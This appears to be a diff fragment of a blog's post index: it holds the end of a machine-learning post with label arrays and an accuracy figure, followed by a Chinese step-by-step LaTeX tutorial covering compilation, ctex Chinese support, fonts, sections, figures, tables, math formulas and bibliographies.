0 5 0 3 2 3 3 9 4 1 4 6 6 9 6 1 3 3 3 0 6 5 8 0 1 6 5 6 1 8 9 8 0 2 1 3 3 9 9 6 2 9 8 2 3 6 5 6 9 7 0 7 4 8 3 4 9 9 4 3 2 0 2 4 5 8 9 9 5 0 7 3 0 4 9 1 2 1 7 7 6 2 2 0 6 1 9 8 8 0 0 1 9 3 9 8 4 8 8 1 4 2 0 1 3 5 1 8 8 3 9 7 1 1 2 6 2 6 1 7 1 2 5 8 0 3 0 9 5 8 9 0 0 8 1 9 3 1 4 4 4 9 7 2 8 1 5 5 8 5 4 4 1 8 5 6 1 1 9 2 8 3 7 5 7 4 9 4 3 6 7 9 0 8 0 1 7 2 8 7 1 3 8 4 4 1 1 9 7 1 8 4 4 0 3 3 2 6 8 8 7 7 7 5 3 0 4 5 5 7 2 3 0 1 7 1 2 8 0 8 0 6 6 6 6 6 4 5 5 8 0 1 3 5 7 7 4 8 6 9 1 2 4 4 4 6 5 0 2 3 1 3 8 1 4 4 7 9 9 9 6 0 5 9 9 6 9 6 4 3 1 1 0 0 5 9 6 4 1 0 1 7 9 9 1 1 1 4 4 3 8 2 1 0 8 5 0 9 0 2 8 5 2 0 3 7 6 3 0 4 3 9 2 5 2 3 2 4 4 6 7 1 6 7 1 7 0 3 7 3 6 2 8 2 1 6 4 1 5 8 6 8 7 5 1 6 8 3 1 8 2 9 1 8 6 7 0 4 2 6 8 9 7 2 8 6 4 2 6 3 8 5 1 8 3 3 0 1 4 1 0 9 1 7 3 6 0 4 2 1 7 1 0 0 0 2 0 9 7 9 8 4 3 6 6 9 0 5 8 5 0 6 3 1 9 2 5 2 7 4 8 6 7 7 9 3 9 4 3 6 3 5 2 1 4 5 5 9 6 5 1 8 5 2 2 2 0 5 8 6 2 7 7 5 2 4 0 2 6 4 2 4 7 9 8 3 6 0 2 8 9 4 6 6 8 7 2 2 7 2 0 2 9 5 2 1 3 7 6 2 0 7 4 7 6 0 6 6 0 1 5 1 2 9 3 9 8 2 9 6 5 4 9 3 7 8 1 8 4 7 7 0 2 3 5 5 7 5 3 4 9 0 8 2 4 3 0 9 7 0 2 3 7 5 2 0 2 7 5 9 6 8 9 1 2 7 6 0 1 4 6 4 3 8 4 2 6 1 0 4 7 3 0 7 2 5 5 1 8 6 4 6 1 0 6 6 1 8 1 3 9 9 8 0 4 4 4 7 0 1 0 9 0 5 4 1 5 4 4 7 0 4 7 1] [6 3 3 4 3 5 9 2 9 0 6 4 9 5 9 4 1 2 7 9 0 0 3 1 1 2 5 1 2 6 8 2 6 4 1 1 0 8 3 1 2 4 6 0 0 8 6 0 2 7 9 1 7 8 6 3 3 0 6 1 0 9 0 9 6 4 4 4 4 0 0 7 1 6 6 0 6 4 7 9 6 1 6 1 5 5 0 2 9 9 3 9 4 4 7 7 9 9 1 1 1 6 0 8 3 7 8 6 0 2 0 8 6 4 3 3 5 0 6 7 5 4 1 2 4 3 2 6 6 9 5 6 2 1 2 7 3 8 9 2 6 5 2 5 2 6 1 9 1 7 4 8 4 1 5 2 0 1 8 1 3 2 5 8 5 7 5 1 0 0 0 9 2 7 5 6 9 6 7 7 4 9 4 6 7 7 3 7 4 2 1 0 7 7 5 5 9 0 3 6 5 3 6 8 1 3 9 5 5 7 4 1 4 5 8 6 0 3 0 5 9 1 7 9 3 4 7 9 3 3 1 6 0 2 5 2 4 0 8 1 2 9 6 3 8 2 6 1 9 0 8 3 7 0 8 2 1 2 7 3 1 1 2 2 8 7 5 1 3 9 7 3 4 4 4 3 7 8 8 7 7 3 1 5 9 7 5 5 1 3 1 9 4 7 2 9 4 1 4 7 9 2 9 3 1 2 7 7 0 9 8 8 7 5 6 7 5 4 7 3 3 9 2 3 2 8 9 2 3 6 0 5 4 3 2 7 0 4 2 5 4 8 9 9 2 2 7 4 4 1 6 3 6 4 6 2 4 8 7 3 6 6 2 5 1 2 0 4 3 3 5 6 9 5 8 5 6 8 9 8 9 8 6 5 7 9 0 5 0 8 2 3 9 4 4 1 4 6 6 9 6 1 3 3 3 0 6 5 3 0 1 4 5 6 1 7 9 8 6 2 1 3 3 9 9 8 7 9 8 4 3 6 5 6 9 7 0 3 9 8 3 4 9 9 4 3 2 0 3 4 5 8 9 9 0 0 7 5 0 4 8 1 2 1 7 7 6 2 2 0 6 1 9 5 5 0 4 8 4 5 9 2 4 8 8 5 4 2 0 1 1 5 1 8 8 3 9 7 1 1 8 6 2 6 1 9 1 3 5 8 6 3 0 9 5 2 9 0 0 8 1 9 3 1 4 4 6 9 7 2 8 1 5 5 8 5 4 4 2 1 5 6 1 1 9 2 8 3 7 5 6 4 9 4 3 6 7 9 0 8 0 1 7 2 8 9 1 3 8 4 4 1 1 9 7 1 8 4 4 0 3 3 2 6 8 8 7 7 7 5 3 0 4 7 5 7 2 3 0 1 7 1 2 8 0 8 0 6 2 6 5 6 4 5 5 8 0 1 5 5 7 7 4 8 6 9 1 2 4 4 4 6 5 0 6 5 1 3 8 1 4 4 7 8 9 9 6 0 5 9 9 6 9 8 4 9 1 1 0 0 5 9 6 4 1 7 1 7 7 9 1 1 1 4 5 3 8 4 1 0 8 5 0 9 0 6 8 8 2 0 3 7 6 3 0 4 3 9 3 5 7 3 3 4 4 6 7 1 6 7 1 7 0 3 7 3 6 1 2 2 1 6 4 1 5 8 5 8 7 5 5 6 8 3 1 8 6 8 1 8 6 7 0 4 2 6 8 7 7 2 8 6 4 3 6 3 8 5 1 8 3 3 0 1 4 1 0 7 1 7 3 6 0 4 3 1 7 1 0 0 0 2 0 9 7 4 8 4 3 8 6 4 0 5 8 5 0 6 3 1 9 2 5 9 7 4 5 6 7 2 9 3 9 4 3 6 6 5 9 1 4 5 5 9 2 5 1 8 5 2 2 2 0 3 5 6 2 7 7 5 7 9 0 2 6 8 8 4 7 9 8 5 6 0 6 8 7 4 8 6 9 7 2 2 7 2 0 2 9 5 1 1 3 4 6 2 0 7 4 7 6 0 6 6 0 1 5 1 2 9 3 9 9 2 9 6 5 4 4 7 7 8 1 8 4 7 7 0 8 3 5 5 7 3 3 4 9 0 8 2 4 3 0 9 7 0 2 3 7 5 2 0 2 7 5 9 6 8 9 1 2 8 6 0 1 4 2 4 3 8 4 2 6 1 0 4 7 3 0 3 2 5 0 1 8 6 4 6 1 0 6 6 1 8 1 5 9 9 8 2 4 4 4 7 0 1 0 9 0 5 4 1 5 4 4 7 0 4 7 8]0.845

    Still 84% accuracy, so our model generalized from the training data pretty well.

    ]]>
    @@ -8581,7 +8581,7 @@ /posts/Latex-latex%E4%B8%AD%E6%96%87%E6%95%99%E7%A8%8B-%E8%A5%BF%E5%8C%97%E5%86%9C%E6%9E%97%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6-%E8%80%BF%E6%A5%A0/ - 资源

    课程

    P1_latex01-LaTeX 环境的安装与配置

    安装

    仅安装 $\TeX\ Live$ 即可,不要与$Mik\TeX$等混合安装!

    $C\TeX$本身封装了$Mik\TeX$。

    编译代码

    创建test.tex文件,并输入如下内容:

    \documentclass{article}

    \begin{document}

    Hello \LaTeX

    \end{document}

    TERMINAL(终端)中输入latex test.tex以编译test.tex

    PS D:\Study\0th-year-master\LateX\20230109> latex test.tex
    This is pdfTeX, Version 3.14159265-2.6-1.40.16 (MiKTeX 2.9)
    (test.tex
    LaTeX2e <2016/03/31>
    Babel <3.9q> and hyphenation patterns for 1 language(s) loaded.
    Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
    ("C:\Users\gzjzx\AppData\Local\Programs\MiKTeX 2.9\tex/latex\base\size10.clo"))

    No file test.aux.
    [1] (test.aux) )
    Output written on test.dvi (1 page, 300 bytes).
    Transcript written on test.log.

    此时会生成test.dvi文件,继续输入dvipdfmx test.dvi继续编译生成test.pdf文件:

    PS D:\Study\0th-year-master\LateX\20230109> dvipdfmx test.dvi
    test.dvi -> test.pdf
    [1]
    2875 bytes written

    或者直接输入xlelatex test.tex直接将test.tex编译生成test.pdf文件:

    PS D:\Study\0th-year-master\LateX\20230109> xelatex test.tex
    This is XeTeX, Version 3.14159265-2.6-0.99992 (MiKTeX 2.9)
    entering extended mode
    (test.tex
    LaTeX2e <2018-04-01> patch level 5
    ("C:\Users\gzjzx\AppData\Local\Programs\MiKTeX 2.9\tex/latex\base\article.cls"
    Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
    ("C:\Users\gzjzx\AppData\Local\Programs\MiKTeX 2.9\tex/latex\base\size10.clo"))
    (test.aux) [1] (test.aux) )
    Output written on test.pdf (1 page).
    Transcript written on test.log.

    也可直接写一个批处理文件bulid.bat完成操作:

    latex test.tex
    dvipdfmx test.dvi
    del *.aux *.dvi *.log

    xelatex test.tex
    del *.aux *.dvi *.log

    随后直接在TERMINAL(终端)中输入build命令完成编译

    VS Code中可以直接使用Ctrl+Alt+B编译

    生成中文

    首先需要保证tex文件使用的是utf-8编码。

    使用\usepackage{ctex}引入宏包以支持中文。

    \documentclass{article}

    \usepackage{ctex}

    \begin{document}

    你好, \LaTeX

    \end{document}

    使用 TeXstudio

    P2_latex02-LaTeX 源文件的基本结构

    % 导言区
    \documentclass{article} % book, report, letter
    \title{My First Document}
    \author{Nan Geng}
    \date{\today}
    % 正文区(文稿区)
    \begin{document}
    \maketitle
    Hello World!

    % here is my big formula.
    Let $f(x)$ be defined by the formula
    $$f(x)=3x^2+x-1$$ which is a polynomial of degree 2.
    \end{document}

    ​ 分为导言区正文区

    png

    P3_latex03-LaTeX 中的中文处理办法

    处理中文

    确定编译器是否为XeLaTeX且编码是否为UTF-8

    导言区使用

    \documentclass{article}

    \usepackage{ctex}

    \documentclass{ctexart}

    以支持中文。

    % 导言区
    \documentclass{ctexart}%book, report, letter

    % \usepackage{ctex}

    \newcommand\degree{^\circ}

    \title{\heiti 杂谈勾股定理}
    \author{张三}
    \date{\today}
    % 正文区(文稿区)
    \begin{document}
    \maketitle

    勾股定理可以用现代语言表述如下:

    直角三角形斜边的平方等于两腰的平方和。

    可以用符号语言表述为:设直角三角形 $ABC$,其中 $\angle
    C=90\degree$,则有:
    \begin{equation} % 用于产生带编号的行间公式
    AB^2 = BC^2 + AC^2.
    \end{equation}
    \end{document}
    • 在导言区使用\newcommand\degree{^\circ}定义\degree,否则会出现编译错误。
    • 使用\begin{equation}\end{equation}产生带编号的行间公式。

    查看帮助文档

    TERMINAL(终端)中输入texdoc ctex命令:

    png

    输入texdoc lshort-zh命令:

    png

    P4_latex04-LaTeX 的字体字号设置

    字体属性

    在 $\LaTeX$ 中,一个字体有 5 种属性:

    • 字体编码

      • 正文字体编码:OT1、T1、EU1 等
      • 数学字体编码:OML、OMS、OMX 等
    • 字体族

      • 罗马字体 Roman Family \textrm:笔画起始处有装饰
      • 无衬线字体 Sans Serif Family \textsf:笔画起始处无装饰
      • 打字机字体 Typewriter Family \texttt:每个字符宽度相同,又称等宽字体
    • 字体系列

      • 粗细
      • 宽度
    • 字体形状

      • 直立 Upright Shape
      • 斜体 Italic Shape
      • 伪斜体 Slanted Shape
      • 小型大写 Small Caps Shape
    • 字体大小

    字体族设置

    注意修饰符及其作用域范围:

    % 字体族设置(罗马字体 Roman Family、无衬线字体 Sans Serif Family、打字机字体 Typewriter Family)
    \textrm{Roman Family}
    \textsf{Sans Serif Family}
    \texttt{Typewriter Family}

    \rmfamily Roman Family
    {\sffamily Sans Serif Family}
    {\ttfamily Typewriter Family}

    {\sffamily who you are? you find self on everyone around.
    take you as the same as others!}

    {\ttfamily Are you wiser than others?
    definitely no. insome ways, may it is true.
    what can you achieve? aluxurious house?
    a brillilant car? an admirable career?who knows? }

    字体系列设置(粗细、宽度)

    % 字体系列设置(粗细、宽度)
    \textmd{Medium Series} \textbf{Boldface Series}

    {\mdseries Medium Series} {\bfseries Boldface Series}

    字体形状(直立、斜体、伪斜体、小型大写)

    \textup{Upright Shape}
    \textit{Italic Shape}
    \textsl{Slanted Shape}
    \textsc{Small Caps Shape}

    {\textup Upright Shape}
    {\textit Italic Shape}
    {\textsl Slanted Shape}
    {\textsc Small Caps Shape}

    中文字体

    % 中文字体
    {\songti 宋体}
    {\heiti 黑体}
    {\fangsong 仿宋}
    {\kaishu 楷书}

    中文字体的\textbf{粗体}是{\heiti 黑体},\textit{斜体}是{\kaishu 楷体}。

    字体大小

    % 字体大小
    {\tiny Hello}\\
    {\scriptsize Hello}\\
    {\footnotesize Hello}\\
    {\small Hello}\\
    {\normalsize Hello}\\
    {\large Hello}\\
    {\Large Hello}\\
    {\LARGE Hello}\\
    {\huge Hello}\\
    {\Huge Hello}\\

    中文字号设置命令

    % 中文字号设置命令
    \zihao{-0} 你好!

    自定义字体

    过多的修饰符不符合$\LaTeX$的思想,使用\newcommand自定义字体。

    导言区中:

    \newcommand{\myfont}{\textbf{\textsf{Fancy Text}}}

    会将正文区所有\myfont替换为\textbf{\textsf{Fancy Text}}

    % 使用自定义字体
    \myfont

    P5_latex05-LaTeX 文档的基本结构

    分节

    正文区中,使用\section{}列提纲,分节,可以使用\subsection{}\subsubsection{}继续分节。

    \documentclass{article}

    \usepackage{ctex}

    \begin{document}

    \section{引言}
    \section{实验方法}
    \section{实验结果}
    \subsection{数据}
    \subsection{图表}
    \subsubsection{实验条件}
    \subsubsection{实验过程}
    \section{结论}
    \section{致谢}

    \end{document}

    设置格式

    使用\documentclass{ctexart}会更改格式,但是这个格式可以自行设置。

    导言区设置格式。将内容与格式分离,是$\LaTeX$的基本思想。

    \documentclass{ctexart}
    % =======设置标题的格式========
    \ctexset{
    % 修改 section。
    section={
    name={,、},
    number={\chinese{section}},
    format=\heiti\raggedright\zihao{-4}, % 设置 section 标题为黑体、右对齐、小 4 号字
    aftername=\hspace{0pt},
    beforeskip=1ex,
    afterskip=1ex
    },
    % 修改 subsection。
    subsection={
    name={,、},
    number={\arabic{subsection}},
    format=\heiti\zihao{5}, % 设置 subsection 标题为黑体、5 号字
    aftername=\hspace{0pt},
    beforeskip=1ex,
    afterskip=1ex
    }
    }

    \begin{document}

    \section{引言}
    近年来,随着逆向工程和三维重建技术的发展和应用,
    获取现实世界中物体的三维数据的方法越来越多的关注和研究,
    很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    近年来,随着逆向工程和三维重建技术的发展和应用,\\
    获取现实世界中物体的三维数据的方法越来越多的关注和研究。
    \par 很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    \section{实验方法}
    \section{实验结果}
    \subsection{数据}
    \subsection{图表}
    \subsubsection{实验条件}
    \subsubsection{实验过程}
    \section{结论}
    \section{致谢}

    \end{document}
    • 使用空行或\par可以另起一段
    • 使用\\会换行,但是不会另起一段

    设置目录

    使用\documentclass{ctexbook}\tableofcontents生成目录。

    \documentclass[UTF8,a4paper,15pt,titlepage,oneside]{ctexbook}

    \begin{document}
    \tableofcontents
    \chapter{绪论}
    \section{引言}
    近年来,随着逆向工程和三维重建技术的发展和应用,
    获取现实世界中物体的三维数据的方法越来越多的关注和研究,
    很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    近年来,随着逆向工程和三维重建技术的发展和应用,\\
    获取现实世界中物体的三维数据的方法越来越多的关注和研究。
    \par 很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    \section{实验方法}
    \section{实验结果}
    \subsection{数据}
    \subsection{图表}
    \section{结论}
    \section{致谢}

    \end{document}

    P6_latex06-LaTeX 中的特殊字符

    • 特殊字符
      • 空白符号
        • 空行分段,多个空行等同 1 个
        • 自动缩进,绝对不能使用空格代替
        • 英文中多个空格处理为 1 个空格,中文中空格将被忽略
        • 汉字与其它字符的间距会自动由 XeLaTex 处理
        • 禁止使用中文全角空格
      • $\LaTeX$控制符
      • 排版符号
      • $\TeX$标志符号
      • 引号
      • 连字符
      • 非英文字符
      • 重音符号(以 o 为例)
    \documentclass{article}

    \usepackage{ctex}
    \usepackage{xltxtra}
    \usepackage{texnames}
    \usepackage{mflogo}

    \begin{document}

    \section{空白符号}
    % 1em(当前字体中 M 的宽度)
    a\quad b

    % 2em
    a\qquad b

    % 约为 1/6 个 em
    a\,b a\thinspace b

    % 0.5 个 em
    a\enspace b

    % 空格
    a\ b

    % 硬空格
    a~b

    % 1pc=12pt=4.2188mm
    a\kern 1pc b

    a\kern -1em b % 可以为负数

    a\hskip 1em b

    a\hspace{35pt}b

    % 占位宽度
    a\hphantom{xyz}b

    % 弹性长度
    a\hfill b

    \section{\LaTeX 控制符}
    \# \$ \% \{ \} \~{} \_{} \^{} \textbackslash \&

    \section{排版符号}
    \S \P \dag \ddag \copyright \pounds

    \section{\TeX 标志符号}
    % 基本符号
    \TeX{} \LaTeX{} \LaTeXe{}

    % xltxtra 宏包提供
    \XeLaTeX

    % texnames 宏包提供
    \AmSTeX{} \AmS-\LaTeX{}
    \BibTeX{} \LuaTeX{}

    % mflogo 宏包提供
    \METAFONT{} \MF{} \MP{}

    \section{引号}
    `'``''``你好''

    \section{连字符}
    - -- ---

    \section{非英文字符}
    \oe \OE \ae \AE \aa \AA \o \O \l \L \ss \SS !`?`

    \section{重音符号(以 o 为例)}
    \`o \'o \^o \''o \~o \=o \.o \u{o} \v{o} \H{o} \r{o} \t{o} \b{o} \c{o} \d{o}

    \end{document}

    P7_latex07-LaTeX 中的插图

    • 使用\usepackage{graphicx}实现插图

    • 语法:\includegraphics[< 选项 >][< 文件名 >]

      • 选项可以有:

        • scale=0.3 缩放 0.3 倍
        • height=2cm 高 2cm
        • width=2cm 宽 2cm
        • height=0.1\textheight 0.1 倍行高
        • width=0.2\textwidth 0.2 倍行宽
        • angle=-45, width0.2\textwidth 顺时针旋转 45°,并且 0.2 倍行宽

        使用终端命令texdoc graphicx查看帮助文档。

      • 文件名可加后缀可不加

    • 格式:EPS、PDF、PNG、JPEG、BMP

    png

    \documentclass{ctexart}
    \usepackage{graphicx}
    \graphicspath{{figures/}, {pics/}} % 图片在当前目录下的 figures 或 pics 目录

    \begin{document}
    \LaTeX{}中的插图:

    \includegraphics[scale=0.3]{lion}
    \end{document}

    png

    P8_latex08-LaTeX 中的表格

    \begin{tabular}[<垂直对齐方式>]{<列格式说明>}
    <表项> & <表项> & ... & <表项> \\
    \end{tabular}

    • \\表示换行
    • &表示不同的列
    • 列格式说明:
      • l 本列左对齐
      • c本列居中对齐
      • r本列右对齐
      • p{<宽>}本列宽度固定,能够自动换行
    \documentclass{ctexart}

    \begin{document}
    \begin{tabular}{|l|c|c|c|p{1.5cm}|}
    \hline \hline
    姓名 & 语文 & 数学 & 外语 & 备注 \\
    \hline
    张三 & 87 & 100 & 93 & 优秀 \\
    \hline
    李四 & 75 & 64 & 52 & 补考另行通知 \\
    \hline
    王二 & 80 & 82 & 78 & \\
    \hline
    \end{tabular}
    \end{document}

    P9_latex09-LaTeX中的浮动体

    要灵活地使用图像和表格的管理,还需要使用浮动体环境。包含figure浮动体环境和table浮动体环境。


    浮动体:

    • 实现灵活分页(避免无法分割的内容产生的页面留白)
    • 给图表添加标题
    • 交叉引用

    figure环境(table环境与之类似)

    \begin{figure}[<允许位置>]
    <任意内容>
    \end{figure}

    <允许位置>参数(默认tbp

    • h,此处(here)-代码所在的上下文位置
    • t,页顶(top)-代码所在页面或之后页面的顶部
    • b,页底(bottom)-代码所在页面或之后页面的底部
    • p,独立一页(page)-浮动页面

    标题控制(caption、bicaption等宏包)

    并排与子图表(subcaption、subfig、floatrow等宏包

    绕排(picinpar、wrapfig等宏包)


    使用\ref{}\label{}进行交叉引用,通常要编译两次才生效。


    \documentclass{ctexart}
    \usepackage{graphicx}
    \graphicspath{{figures/}}

    \begin{document}

    \LaTeX{}中\TeX 系统的吉祥物---小狮子见图\ref{fig-lion}。

    \begin{figure}[htbp]
    \centering
    \includegraphics[scale=0.3]{lion}
    \caption{\TeX 系统的吉祥物---小狮子}\label{fig-lion}
    \end{figure}

    遥看太白,看积雪皑皑,别有一番风景(图\ref{fig-mountain})

    \begin{figure}[htbp]
    \centering
    \includegraphics[scale=0.3]{mountain}
    \caption{太白山}\label{fig-mountain}
    \end{figure}

    当然,在\LaTeX{}中也可以使用表\ref{tab-score}所示的表格。

    \begin{table}[h]
    \centering
    \caption{考试成绩单}\label{tab-score}
    \begin{tabular}{|l|c|c|c|p{1.5cm}|}
    \hline \hline
    姓名 & 语文 & 数学 & 外语 & 备注 \\
    \hline
    张三 & 87 & 100 & 93 & 优秀 \\
    \hline
    李四 & 75 & 64 & 52 & 补考另行通知 \\
    \hline
    王二 & 80 & 82 & 78 & \\
    \hline
    \end{tabular}
    \end{table}

    \end{document}

    P10_latex10-LaTeX数学公式初步

    \documentclass{article}

    \usepackage{ctex}
    \usepackage{amsmath}

    \begin{document}
    \section{简介}
    \LaTeX{}将排版内容分为文本模式和数学模式。
    文本模式用于普通文本排版,数学模式用于数学公式排版。
    \section{行内公式}
    \subsection{美元符号}
    交换律是 $a+b=b+a$,如 $1+2=2+1=3$
    \subsection{小括号}
    交换律是 \(a+b=b+a\),如\(1+2=2+1=3\)
    \subsection{math环境}
    交换律是 \begin{math}a+b=b+a\end{math},如
    \begin{math}1+2=2+1=3\end{math}。
    \section{上下标}
    \subsection{上标}
    $3x^{20} - x + 2 = 0$

    $3x^{3x^{20} - x + 2} - x + 2 = 0$
    \subsection{下标}
    $a_0, a_1, a_2$

    $a_0, a_1, a_2, ..., a_{3x^{20} - x + 2}$
    \section{希腊字母}
    $\alpha$
    $\beta$
    $\gamma$
    $\epsilon$
    $\pi$
    $\omega$

    $\Gamma$
    $\Delta$
    $\Theta$
    $\Pi$
    $\Omega$

    $\alpha^3 + \beta^2 + \gamma = 0$

    \section{数学函数}
    $\log$
    $\sin$
    $\cos$
    $\arcsin$
    $\arccos$
    $\arctan$
    $\ln$

    $\sin^2x+\cos^2x=1$
    $y=\arcsin x$

    $y=\sin^{-1}x$

    $y=\log_2x$

    $y=\ln x$

    $\sqrt{2}$ $\sqrt{x^2+y^2}$ $\sqrt{2+\sqrt{2}}$ $\sqrt[4]{x}$
    \section{分式}
    大约是原体积的$3/4$
    大约是原体积的$\frac{3}{4}$

    $\frac{x}{x^2 + x + 1}$

    $\frac{\sqrt{x-1}}{\sqrt{x+1}}$

    $\frac{1}{1 + \frac{1}{x}}$

    $\sqrt{\frac{x}{x^2 + x + 1}}$
    \section{行间公式}
    \subsection{美元符号}
    交换律是
    $$a+b=b+a$$

    $$1+2=2+1=3$$
    \subsection{中括号}
    交换律是
    \[a+b=b+a\]

    \[1+2=2+1=3\]
    \subsection{displaymath环境}
    交换律是
    \begin{displaymath}
    a+b=b+a,
    \end{displaymath}

    \begin{displaymath}
    1+2=2+1=3.
    \end{displaymath}
    \subsection{自动编号公式equation环境}
    交换律见式\ref{eq:commutative}
    \begin{equation}
    a+b=b+a \label{eq:commutative}
    \end{equation}
    \subsection{不编号公式equation*环境} % 需要使用amsmath宏包
    交换律见式\ref{eq:commutative2}
    \begin{equation*}
    a+b=b+a \label{eq:commutative2}
    \end{equation*}

    公式的编号与交叉引用也是自动实现的,
    大家在排版中,要习惯与采用自动化的方式处理图、表、公式的编号与交叉引用。
    \end{document}

    latex11-LaTeX数学公式的矩阵

    矩阵环境:

    • &分割列
    • \\分割行
    \documentclass{ctexart}

    \usepackage{amsmath}

    \newcommand{\adots}{\mathinner{\mkern2mu
    \raisebox{0.1em}{.}
    \mkern2mu\raisebox{0.4em}{.}
    \mkern2mu\raisebox{0.7em}{.}\mkern1mu}}

    \begin{document}
    \section{matrix环境}
    \[
    \begin{matrix}
    0 & 1 \\
    1 & 0
    \end{matrix}
    \]

    \section{pmatrix环境}
    \[
    \begin{pmatrix}
    0 & -1 \\
    1 & 0
    \end{pmatrix}
    \]

    \section{bmatrix环境}
    \[
    \begin{bmatrix}
    0 & -1 \\
    1 & 0
    \end{bmatrix}
    \]

    \section{Bmatrix环境}
    \[
    \begin{Bmatrix}
    0 & -1 \\
    1 & 0
    \end{Bmatrix}
    \]

    \section{vmatrix环境}
    \[
    \begin{vmatrix}
    0 & -1 \\
    1 & 0
    \end{vmatrix}
    \]

    \section{Vmatrix环境}
    \[
    \begin{Vmatrix}
    0 & -1 \\
    1 & 0
    \end{Vmatrix}
    \]

    \section{可以使用上下标}
    \[
    A = \begin{pmatrix}
    a_{11}^2 & a_{12}^2 & a_{13}^2 \\
    0 & a_{22} & a_{23} \\
    0 & 0 & a_{33}
    \end{pmatrix}
    \]

    \section{常用省略号:$\backslash$dots,$\backslash$vdots,$\backslash$ddots}
    没有$\backslash$adots,需要手动定义。
    \[
    A = \begin{bmatrix}
    a_{11} & \dots & a_{1n} \\
    \adots & \ddots & \vdots \\
    0 & & a_{nn}
    \end{bmatrix}_{n \times n}
    \]

    \section{分块矩阵(矩阵嵌套)}
    \[
    \begin{pmatrix}
    \begin{matrix}1&0\\0&1\end{matrix} & \text{\Large 0} \\
    \text{\Large 0} & \begin{matrix} 1&0\\0&-1\end{matrix}
    \end{pmatrix}
    \]

    \section{三角矩阵}
    \[
    \begin{pmatrix}
    a_{11} & a_{12} & \cdots & a_{1n} \\
    & a_{22} & \cdots & a_{2n} \\
    & & \ddots & \vdots \\
    \multicolumn{2}{c}{\raisebox{1.3ex}[0pt]{\Huge 0}} & & a_{nn}
    \end{pmatrix}
    \]

    \section{跨列的省略号} % \hdotsfor{columns}
    \[
    \begin{pmatrix}
    1 & \frac 12 & \dots & \frac 1n \\
    \hdotsfor{4} \\
    m & frac m2 & \dots & \frac mn
    \end{pmatrix}
    \]

    \section{行内小矩阵(smallmatrix)环境}
    复数 $z = (x, y)$ 可也用矩阵
    \begin{math}
    \left(
    \begin{smallmatrix}
    x & -y \\
    y & -x
    \end{smallmatrix}
    \right)
    \end{math}
    来表示。

    \section{array环境(类似于表格环境tabular)}
    \[
    \begin{array}{r|r}
    \frac{1}{2} & 0 \\
    \hline
    0 & -\frac a{bc} \\
    \end{array}
    \]

    \section{用array环境构造复杂矩阵}
    \[
    % @{<内容>}-添加任意内容,不占表项计数
    % 此处添加一个负值空白,表示向左移-5pt的距离
    \begin{array}{c@{\hspace{-5pt}}l}
    % 第1行,第1列
    \left(
    \begin{array}{ccc|ccc}
    a & \cdots & a & b & \cdots & b \\
    & \ddots & \vdots & \vdots & \adots \\
    & a & b \\ \hline
    & & & c & \cdots & c \\
    & & & \vdots & & \vdots \\
    \multicolumn{3}{c|}{\raisebox{2ex}[0pt]{\Huge 0}} & c & \cdots & c
    \end{array}
    \right)
    % 第1行,第2列
    \begin{array}{l}
    % \left. 仅表示与 \right\} 配对,什么都不输出
    \left. \rule{0mm}{7mm}\right\}p \\
    \\
    \left.\rule{0mm}{7mm}\right\}q
    \end{array}
    \\[-5pt]
    % 第2行第1列
    \begin{array}{cc}
    \underbrace{\rule{17mm}{0mm}}_m &
    \underbrace{\rule{17mm}{0mm}}_m
    \end{array}
    & % 第2行第2列
    \end{array}
    \]

    \end{document}

    latex12-LaTeX数学公式的多行公式

    \documentclass{ctexart}

    \usepackage{amsmath}
    \usepackage{amssymb}

    \begin{document}
    \section{gather 标准多行公式}
    \subsection{gather 带编号}
    \begin{gather}
    a + b = b + a \\
    ab ba
    \end{gather}

    \subsection{gather* 不带编号}
    \begin{gather*}
    3+5=5+3=8 \\
    3 \times 5 = 5 \times 3
    \end{gather*}

    \subsection{在换行符前使用 notag 阻止编号}
    \begin{gather}
    3^2 + 4^2 = 5^2 \notag \\
    5^2 + 12^2 = 13^2 \notag \\
    a^2 + b^2 = c^2
    \end{gather}

    \section{align 对齐多行公式}
    \subsection{align 带编号}
    \begin{align}
    x & = t + \cos t + 1 \\
    y & = 2\sin t
    \end{align}

    \subsection{align* 不带编号}
    \begin{align*}
    x & = t & x & = \cos t & x & =t \\
    y & = 2t & y & = \sin(t+1) & y & = \sin t
    \end{align*}

    \section{split 环境(对齐采用 align 环境的方式,编号在中间)}
    \begin{equation}
    \begin{split}
    \cos 2x &= \cos^2x - \sin^2x \\
    &= 2\cos^2x - 1
    \end{split}
    \end{equation}

    \section{cases 环境}
    分段函数,每行公式中使用 \& 分割为两部分,通常表示值和后面的条件。
    \begin{equation}
    D(x) = \begin{cases}
    1, & \text{如果 } x \in \mathbb{Q}; \\
    0, & \text{如果 } x \in \mathbb{R}\setminus\mathbb{Q}.
    \end{cases}
    \end{equation}
    \end{document}

    P13_latex13-LaTeX中的参考文献BibTex

    直接在tex文件中管理

    \begin{thebibliography}{99}  % 这个数字99 指的是参考文献的项目按照数字进行编号, 并且最多为99个, 如果你有更多的项目, 把这个数字改大一点就行了
    \bibitem[记号]{引用标志}文献条目1
    \bibitem[记号]{引用标志}文献条目2
    ...
    \end{thebibliography}

    其中文献条目包括:作者,题目,出版社,年代,版本,页码等。

    引用时可以采用:\cite{引用标志1, 引用标志2, ...}


    \documentclass{ctexart}

    \begin{document}
    引用一篇文章\cite{article1} 引用一本书\cite{book1}等

    \begin{thebibliography}{99}
    \bibitem{article1}陈立辉,苏伟,蔡川,陈晓云.
    \emph{基于 LaTex 的 web 数学公式提取方法研究}[J]。计算机科学。2014(06)

    \bibitem{book1}william H.Press,Saul A. Teukolsky,William T. Vetterling,Brian P.Elannery,
    \emph{Numerical Recipes js Edition:
    The Art of Scientific Computing}
    Cambridge University Press, New York,2007.

    \bibitem{latexGuide} Kopka Helmut, w.Daly Patrick,
    \emph{Guide to \LaTeX}, $4^{th}$ Edition.
    Available at \texttt{http://www.amazon.com}.

    \bibitem{latexMath} Graetzer George, \emph{Math Into \LaTeX},
    BirkhAauser Boston; 3 edition (June 22, 2000).
    \end{thebibliography}
    \end{document}

    使用 BibTeX

    test.bib文件中输入如下内容:

    @book{mittelbach2004,
    title = {The {{\LaTex}} Companion},
    publisher = {Addison-wesley},
    year = {2004},
    author = {Frank Mittelbach and Michel Goossens},
    series = {Tools and Techniques for Computer Typesetting},
